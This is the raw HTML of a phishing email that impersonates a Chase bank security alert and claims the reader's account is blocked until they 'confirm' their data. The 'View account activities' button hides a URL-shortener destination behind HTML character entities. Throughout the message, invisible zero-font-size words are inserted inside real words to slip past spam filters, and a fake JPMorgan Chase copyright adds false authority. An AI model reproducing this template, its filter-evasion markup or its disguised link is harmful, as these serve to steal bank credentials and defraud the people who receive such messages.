 <html lang="en"><head><style>body{margin:0;padding:0;overflow-x:auto !important;overflow-y:hidden !important}.mail-detail-content{box-sizing:border-box;font-family:-apple-system,BlinkMacSystemFont,"Helvetica Neue","Segoe UI",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:13px;font-weight:normal;font-feature-settings:"liga" 0;width:100%;position:relative;padding:0}.ios.smartphone .mail-detail-content{-webkit-overflow-scrolling:touch;overflow-x:auto}.smartphone .mail-detail-content{font-size:15px}.mail-detail-content>div>[class$="-content"]{padding:0}.mail-detail-content.plain-text{font-family:-apple-system,BlinkMacSystemFont,"Helvetica Neue","Segoe UI",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";white-space:pre-wrap}.mail-detail-content.plain-text blockquote{white-space:normal}.mail-detail-content.fixed-width-font,.mail-detail-content.fixed-width-font.plain-text,.mail-detail-content.fixed-width-font blockquote,.mail-detail-content.fixed-width-font.plain-text blockquote,.mail-detail-content.fixed-width-font blockquote p,.mail-detail-content.fixed-width-font.plain-text blockquote p{font-family:monospace;-webkit-font-feature-settings:normal;font-feature-settings:normal}.mail-detail-content.simple-mail{max-width:700px}.mail-detail-content.simple-mail.big-screen{max-width:100%}.mail-detail-content.simple-mail img{max-width:100%;height:auto!important}.mail-detail-content img[src=""]{background-color:rgba(0,0,0,0.1);background-image:repeating-linear-gradient(45deg, transparent, transparent 20px, rgba(255,255,255,0.5) 20px, rgba(255,255,255,0.5) 40px)}.mail-detail-content p{font-family:-apple-system,BlinkMacSystemFont,"Helvetica Neue","Segoe UI",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";margin:0 0 1em 0}.mail-detail-content h1{font-size:28px}.mail-detail-content h2{font-size:21px}.mail-detail-content h3{font-size:16.38px}.mail-detail-content h4{font-size:14px}.mail-detail-content h5{font-size:11.62px}.mail-detail-content h6{font-size:9.38px}.mail-detail-content a{word-break:break-word;text-decoration:none;color:inherit}.mail-detail-content a:hover{color:inherit}.mail-detail-content a[href]{color:#3c61aa;text-decoration:underline}.mail-detail-content th{padding:8px;text-align:center}.mail-detail-content th[align="left"]{text-align:left}.mail-detail-content .calendar-detail .label{display:block;text-shadow:none;font-weight:normal;background-color:transparent}.mail-detail-content img.emoji-softbank{margin:0 2px}.mail-detail-content pre{word-break:keep-all;word-break:initial;white-space:pre-wrap;background-color:transparent;border:0 none;border-radius:0}.mail-detail-content table{font-family:-apple-system,BlinkMacSystemFont,"Helvetica Neue","Segoe UI",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:13px;font-weight:normal;font-feature-settings:"liga" 0;line-height:normal;border-collapse:collapse}.mail-detail-content ul,.mail-detail-content ol{padding:0;padding-left:16px;margin:1em 0 1em 24px}.mail-detail-content ul{list-style-type:disc}.mail-detail-content ul ul{list-style-type:circle}.mail-detail-content ul ul ul{list-style-type:square}.mail-detail-content li{line-height:normal;margin-bottom:0.5em}.mail-detail-content blockquote{color:#555;font-size:13px;border-left:2px solid #ddd;padding:0 0 0 16px;margin:16px 0 16px 0}.mail-detail-content blockquote p{font-size:13px}.mail-detail-content blockquote blockquote{border-color:#283f73;margin:8px 0}.mail-detail-content.colorQuoted blockquote blockquote{color:#283f73 !important;border-left:2px solid #283f73}.mail-detail-content.colorQuoted blockquote blockquote a[href]:not(.deep-link){color:#283f73}.mail-detail-content.colorQuoted blockquote blockquote a[href]:not(.deep-link):hover{color:#1b2a4d}.mail-detail-content.colorQuoted blockquote blockquote blockquote{color:#dd0880 !important;border-left:2px solid #dd0880}.mail-detail-content.colorQuoted blockquote blockquote blockquote a[href]:not(.deep-link){color:#dd0880}.mail-detail-content.colorQuoted blockquote blockquote blockquote a[href]:not(.deep-link):hover{color:#ac0663}.mail-detail-content.colorQuoted blockquote blockquote blockquote blockquote{color:#8f09c7 !important;border-left:2px solid #8f09c7}.mail-detail-content.colorQuoted blockquote blockquote blockquote blockquote a[href]:not(.deep-link){color:#8f09c7}.mail-detail-content.colorQuoted blockquote blockquote blockquote blockquote a[href]:not(.deep-link):hover{color:#6c0796}.mail-detail-content.colorQuoted blockquote blockquote blockquote blockquote blockquote{color:#767676 !important;border-left:2px solid #767676}.mail-detail-content.colorQuoted blockquote blockquote blockquote blockquote blockquote a[href]:not(.deep-link){color:#767676}.mail-detail-content.colorQuoted blockquote blockquote blockquote blockquote blockquote a[href]:not(.deep-link):hover{color:#5d5d5d}.mail-detail-content.disable-links a[href]{color:#aaa !important;text-decoration:line-through !important;cursor:default !important;pointer-events:none !important}.mail-detail-content .blockquote-toggle{color:#767676;font-size:13px;padding-left:56px;margin:16px 0;min-height:16px;word-break:break-word}.mail-detail-content .blockquote-toggle button.bqt{color:#696969;background-color:#eee;padding:1px 10px;display:inline-block;font-size:14px;line-height:16px;cursor:pointer;outline:0;position:absolute;left:0;border:0}.mail-detail-content .blockquote-toggle button.bqt:hover,.mail-detail-content .blockquote-toggle button.bqt:focus{color:#fff;background-color:#3c61aa;text-decoration:none}.mail-detail-content .max-size-warning{color:#767676;padding:16px 16px 0 16px;border-top:1px solid #ddd}.mail-detail-content a.deep-link{color:white;background-color:#3c61aa;text-decoration:none;font-size:90%;font-weight:bold;font-family:-apple-system,BlinkMacSystemFont,"Helvetica Neue","Segoe UI",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol" !important;padding:0.10em 8px;border-radius:3px}.mail-detail-content a.deep-link:hover,.mail-detail-content a.deep-link:focus,.mail-detail-content a.deep-link:active{color:white;background-color:#2f4b84}@media print{.mail-detail-content .collapsed-blockquote{display:block !important}.mail-detail-content .blockquote-toggle{display:none !important}}.mail-detail-content>div[id*="ox-"]>h1,.mail-detail-content>div[id*="ox-"]>h2,.mail-detail-content>div[id*="ox-"]>h3,.mail-detail-content>div[id*="ox-"]>h4,.mail-detail-content>div[id*="ox-"]>h5{margin-top:0}</style></head><body class="mail-detail-content noI18n colorQuoted" role="complementary" aria-label="CHAS? Security Alerts Your Online has been Limited."><p>&nbsp;</p>  <p>&nbsp;</p>  <p>&nbsp;</p>  <p>&nbsp;</p>  <p>&nbsp;</p>  <p>&nbsp;</p>  <table cellpadding="0" cellspacing="0" style="border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #ffffff; width: 100%;" id="u_body"> <tbody> <tr style="vertical-align: top;"> <td style="word-break: break-word; border-collapse: collapse !important; vertical-align: top;"> <div style="padding: 0px; background-color: transparent;" class="u-row-container"> <div style="margin: 0 auto; min-width: 320px; max-width: 520px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;" class="u-row"> <div style="border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;">  <div style="max-width: 320px; min-width: 520px; display: table-cell; vertical-align: top;" class="u-col u-col-100"> <div style="height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;"> <div style="box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;"> <table cellpadding="0" cellspacing="0" width="100%" border="0" style="font-family: 'Cabin',sans-serif;"> <tbody> <tr> <td align="left" style="overflow-wrap: break-word; word-break: break-word; padding: 10px;"> <div style="line-height: 190%; text-align: center; overflow-wrap: break-word;"> <div style="font-family: Cabin, sans-serif; font-size: 14px;"> <div> <div> <div> <div> <div> <div> <p style="line-height: 190%;"><img data-ils="4" height="90" width="270" alt="Chase Partners with Expedia Group to Enhance the Ultimate Rewards® Travel  Experience | Business Wire" src="https://connect-ucs.xfinity.com/proxy?source=https%3A%2F%2Fencrypted-tbn0.gstatic.com%2Fimages%3Fq%3Dtbn%3AANd9GcR3lG-rARRheM71iupuk4VaAoMCPO2WG-uvNw%26usqp%3DCAU" class="rg_i Q4LuWd" data-proxy-original-src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR3lG-rARRheM71iupuk4VaAoMCPO2WG-uvNw&amp;usqp=CAU"></p> <hr id="null"> <p style="line-height: 150%;font-size: 17px">Dear customer,</p> </div> </div> </div> </div> </div> </div> </div> <div> <div> <div> <div> <div> <div> <div> <p style="line-height: 190%;">We've observed some odd or abnormal behavior on your account. For your  sec<strong style='font-size: 0px;'> particularly </strong>urity, we have  bl<strong style='font-size: 0px;'> best </strong>ocked  ac<strong style='font-size: 0px;'> you </strong>cess to your  ac<strong style='font-size: 0px;'> see </strong>count until you  co<strong style='font-size: 0px;'> expert </strong>nfirm your data.</p> <p style="line-height: 190%;">We're working around the clock to keep your account(s) safe.</p> </div> </div> </div> </div> </div> </div> </div> </div> </td> </tr> </tbody> </table> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <a target="_blank" href="https://&#x62;&#x69;&#x74;&#x2e;&#x6c;&#x79;&#x2f;&#x33;&#x4f;&#x7a;&#x6e;&#x38;&#x6e;&#x6d;" style="word-break: break-word; color: #3c61aa; font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Segoe UI', Arial, sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: 13px;" rel="noopener"><strong>View&nbsp;account activities</strong></a><br><br> <table cellpadding="0" cellspacing="0" width="100%" border="0" style="font-family: 'Cabin',sans-serif;"> <tbody> <tr> <td align="left" style="overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: 'Cabin',sans-serif;"> <div style="font-size: 14px; line-height: 140%; text-align: left; word-wrap: break-word;"> <p style="line-height: 140%;">After a major computer  sys<strong style='font-size: 0px;'> team </strong>tem update and the  corre<strong style='font-size: 0px;'> police </strong>ction  o<strong style='font-size: 0px;'> follow </strong>f  ma<strong style='font-size: 0px;'> responsibility </strong>ny  bu<strong style='font-size: 0px;'> project </strong>gs, we&nbsp; &nbsp;  che<strong style='font-size: 0px;'> station </strong>ck  th<strong style='font-size: 0px;'> best </strong>e user account(s) to make sure there are no problems.</p> <hr id="null"></div> </td> </tr> </tbody> </table> <table cellpadding="0" cellspacing="0" width="100%" border="0" style="font-family: 'Cabin',sans-serif;"> <tbody> <tr> <td align="left" style="overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: 'Cabin',sans-serif;"> <div style="font-family: Bitter; font-size: 14px; line-height: 140%; text-align: left; word-wrap: break-word;"> <p style="line-height: 140%;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;<a target="_blank" href="https://www.xfinity.com/?INTCMP=ILC:MA:GEN:GEN5b9ab8ad1e540" style="word-break: break-word; color: #3c61aa; font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Segoe UI', Arial, sans-serif, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Symbol'; font-size: small; text-align: center;" rel="noopener"><span style="font-family: tahoma;">©&nbsp;</span><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 12px; text-align: -webkit-left;">2023 JPMorgan  Ch<strong style='font-size: 0px;'> president </strong>ase &amp; Co</span></span></a></p> </div> </td> </tr> </tbody> </table> </div> </div> </div>  </div> </div> </div> </td> </tr> </tbody> </table>  <p>&nbsp;</p>  </body></html>
